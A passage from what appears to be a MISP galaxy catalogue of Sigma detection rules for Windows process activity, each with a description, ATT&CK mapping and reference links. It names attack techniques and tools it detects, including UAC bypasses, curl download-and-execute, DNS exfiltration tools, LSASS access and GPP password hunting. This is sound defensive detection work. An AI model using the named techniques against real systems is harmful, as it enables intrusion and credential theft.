  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10512. Table References

Links

https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/

https://twitter.com/nas_bench/status/1534957360032120833

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml

Regsvr32 DLL Execution With Uncommon Extension

Detects a "regsvr32" execution where the DLL doesn’t contain a common file extension.

The tag is: misp-galaxy:sigma-rules="Regsvr32 DLL Execution With Uncommon Extension"

Regsvr32 DLL Execution With Uncommon Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 10513. Table References

Links

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml

HackTool - Htran/NATBypass Execution

Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)

The tag is: misp-galaxy:sigma-rules="HackTool - Htran/NATBypass Execution"

HackTool - Htran/NATBypass Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10514. Table References

Links

https://github.com/HiwinCN/HTran

https://github.com/cw1997/NATBypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml

PUA - NirCmd Execution

Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity

The tag is: misp-galaxy:sigma-rules="PUA - NirCmd Execution"

PUA - NirCmd Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10515. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://www.nirsoft.net/utils/nircmd2.html#using

https://www.nirsoft.net/utils/nircmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml

Renamed SysInternals DebugView Execution

Detects suspicious renamed SysInternals DebugView execution

The tag is: misp-galaxy:sigma-rules="Renamed SysInternals DebugView Execution"

Renamed SysInternals DebugView Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 10516. Table References

Links

https://www.epicturla.com/blog/sysinturla

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml

Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension

Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension"

Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"

Table 10517. Table References

Links

https://www.fortiguard.com/threat-signal-report/4718?s=09

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml

Uncommon Child Process Of Conhost.EXE

Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of Conhost.EXE"

Uncommon Child Process Of Conhost.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10518. Table References

Links

http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml

Suspicious Rundll32 Invoking Inline VBScript

Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Invoking Inline VBScript"

Suspicious Rundll32 Invoking Inline VBScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10519. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml

Compress Data and Lock With Password for Exfiltration With WINZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

The tag is: misp-galaxy:sigma-rules="Compress Data and Lock With Password for Exfiltration With WINZIP"

Compress Data and Lock With Password for Exfiltration With WINZIP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10520. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml

Use of W32tm as Timer

When configured with suitable command line arguments, w32tm can act as a delay mechanism

The tag is: misp-galaxy:sigma-rules="Use of W32tm as Timer"

Use of W32tm as Timer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 10521. Table References

Links

https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains

https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml

Potential Provisioning Registry Key Abuse For Binary Proxy Execution

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

The tag is: misp-galaxy:sigma-rules="Potential Provisioning Registry Key Abuse For Binary Proxy Execution"

Potential Provisioning Registry Key Abuse For Binary Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10522. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml

File Download From IP Based URL Via CertOC.EXE

Detects when a user downloads a file from an IP based URL using CertOC.exe

The tag is: misp-galaxy:sigma-rules="File Download From IP Based URL Via CertOC.EXE"

File Download From IP Based URL Via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10523. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml

Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet"

Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 10524. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml

Greedy File Deletion Using Del

Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.

The tag is: misp-galaxy:sigma-rules="Greedy File Deletion Using Del"

Greedy File Deletion Using Del has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10525. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase

https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml

Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)

The tag is: misp-galaxy:sigma-rules="Suspicious Group And Account Reconnaissance Activity Using Net.EXE"

Suspicious Group And Account Reconnaissance Activity Using Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 10527. Table References

Links

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml

UAC Bypass Using IEInstal - Process

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IEInstal - Process"

UAC Bypass Using IEInstal - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10528. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml

HackTool - Stracciatella Execution

Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.

The tag is: misp-galaxy:sigma-rules="HackTool - Stracciatella Execution"

HackTool - Stracciatella Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10529. Table References

Links

https://github.com/mgeeky/Stracciatella

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml

Potential Network Sniffing Activity Using Network Tools

Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

The tag is: misp-galaxy:sigma-rules="Potential Network Sniffing Activity Using Network Tools"

Potential Network Sniffing Activity Using Network Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10530. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml

DNS Exfiltration and Tunneling Tools Execution

Well-known DNS Exfiltration tools execution

The tag is: misp-galaxy:sigma-rules="DNS Exfiltration and Tunneling Tools Execution"

DNS Exfiltration and Tunneling Tools Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 10531. Table References

Links

https://github.com/yarrick/iodine

https://github.com/iagox86/dnscat2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml

Share And Session Enumeration Using Net.EXE

Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.

The tag is: misp-galaxy:sigma-rules="Share And Session Enumeration Using Net.EXE"

Share And Session Enumeration Using Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 10532. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml

Suspicious Child Process Of BgInfo.EXE

Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of BgInfo.EXE"

Suspicious Child Process Of BgInfo.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10533. Table References

Links

https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml

Potential Regsvr32 Commandline Flag Anomaly

Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.

The tag is: misp-galaxy:sigma-rules="Potential Regsvr32 Commandline Flag Anomaly"

Potential Regsvr32 Commandline Flag Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10534. Table References

Links

https://twitter.com/sbousseaden/status/1282441816986484737?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml

Findstr GPP Passwords

Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.

The tag is: misp-galaxy:sigma-rules="Findstr GPP Passwords"

Findstr GPP Passwords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10535. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml

Finger.exe Suspicious Invocation

Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays

The tag is: misp-galaxy:sigma-rules="Finger.exe Suspicious Invocation"

Finger.exe Suspicious Invocation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10536. Table References

Links

http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt

https://twitter.com/bigmacjpg/status/1349727699863011328?s=12

https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_usage.yml

Suspicious Rundll32 Activity Invoking Sys File

Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452

The tag is: misp-galaxy:sigma-rules="Suspicious Rundll32 Activity Invoking Sys File"

Suspicious Rundll32 Activity Invoking Sys File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10537. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_sys.yml

HackTool - UACMe Akagi Execution

Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata

The tag is: misp-galaxy:sigma-rules="HackTool - UACMe Akagi Execution"

HackTool - UACMe Akagi Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10538. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme.yml

Potential Arbitrary Command Execution Using Msdt.EXE

Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary Command Execution Using Msdt.EXE"

Potential Arbitrary Command Execution Using Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10539. Table References

Links

https://twitter.com/_JohnHammond/status/1531672601067675648

https://twitter.com/nao_sec/status/1530196847679401984

https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml

Cloudflared Quick Tunnel Execution

Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.

The tag is: misp-galaxy:sigma-rules="Cloudflared Quick Tunnel Execution"

Cloudflared Quick Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 10540. Table References

Links

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/

https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://www.intrinsec.com/akira_ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml

Compressed File Extraction Via Tar.EXE

Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.

The tag is: misp-galaxy:sigma-rules="Compressed File Extraction Via Tar.EXE"

Compressed File Extraction Via Tar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10541. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://lolbas-project.github.io/lolbas/Binaries/Tar/

https://unit42.paloaltonetworks.com/chromeloader-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_extraction.yml

Sysmon Driver Unloaded Via Fltmc.EXE

Detects possible Sysmon filter driver unloaded via fltmc.exe

The tag is: misp-galaxy:sigma-rules="Sysmon Driver Unloaded Via Fltmc.EXE"

Sysmon Driver Unloaded Via Fltmc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10542. Table References

Links

https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml

Potential CommandLine Path Traversal Via Cmd.EXE

Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking

The tag is: misp-galaxy:sigma-rules="Potential CommandLine Path Traversal Via Cmd.EXE"

Potential CommandLine Path Traversal Via Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10543. Table References

Links

https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/

https://twitter.com/Oddvarmoe/status/1270633613449723905

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml

Curl Download And Execute Combination

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

The tag is: misp-galaxy:sigma-rules="Curl Download And Execute Combination"

Curl Download And Execute Combination has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10544. Table References

Links

https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml

Copy From Or To Admin Share Or Sysvol Folder

Detects a copy command or a copy utility execution to or from an Admin share or remote

The tag is: misp-galaxy:sigma-rules="Copy From Or To Admin Share Or Sysvol Folder"

Copy From Or To Admin Share Or Sysvol Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10545. Table References

Links

https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html

https://twitter.com/SBousseaden/status/1211636381086339073

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml

UAC Bypass via ICMLuaUtil

Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface

The tag is: misp-galaxy:sigma-rules="UAC Bypass via ICMLuaUtil"

UAC Bypass via ICMLuaUtil has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10546. Table References

Links

https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml

HackTool - ADCSPwn Execution

Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service

The tag is: misp-galaxy:sigma-rules="HackTool - ADCSPwn Execution"

HackTool - ADCSPwn Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 10547. Table References

Links

https://github.com/bats3c/ADCSPwn

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml

Sysprep on AppData Folder

Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)

The tag is: misp-galaxy:sigma-rules="Sysprep on AppData Folder"

Sysprep on AppData Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10548. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml

HackTool - SharpEvtMute Execution

Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs

The tag is: misp-galaxy:sigma-rules="HackTool - SharpEvtMute Execution"

HackTool - SharpEvtMute Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10549. Table References

Links

https://github.com/bats3c/EvtMute

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml

PowerShell Get-Process LSASS

Detects a "Get-Process" cmdlet and it’s aliases on lsass process, which is in almost all cases a sign of malicious activity

The tag is: misp-galaxy:sigma-rules="PowerShell Get-Process LSASS"

PowerShell Get-Process LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 10550. Table References

Links

https://twitter.com/PythonResponder/status/1385064506049630211

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml

PUA - AdFind Suspicious Execution

Detects AdFind execution with common flags seen used during attacks

The tag is: misp-galaxy:sigma-rules="PUA - AdFind Suspicious Execution"

PUA - AdFind Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 10551. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md

https://thedfirreport.com/2020/05/08/adfind-recon/

https://www.joeware.net/freetools/tools/adfind/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml

HackTool - winPEAS Execution

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz

The tag is: misp-galaxy:sigma-rules="HackTool - winPEAS Execution"

HackTool - winPEAS Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 10552. Table References

Links

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation

https://github.com/carlospolop/PEASS-ng

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml

Root Certificate Installed From Susp Locations

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="Root Certificate Installed From Susp Locations"

Root Certificate Installed From Susp Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10553. Table References

Links

https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml

Tasks Folder Evasion

The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr

The tag is: misp-galaxy:sigma-rules="Tasks Folder Evasion"
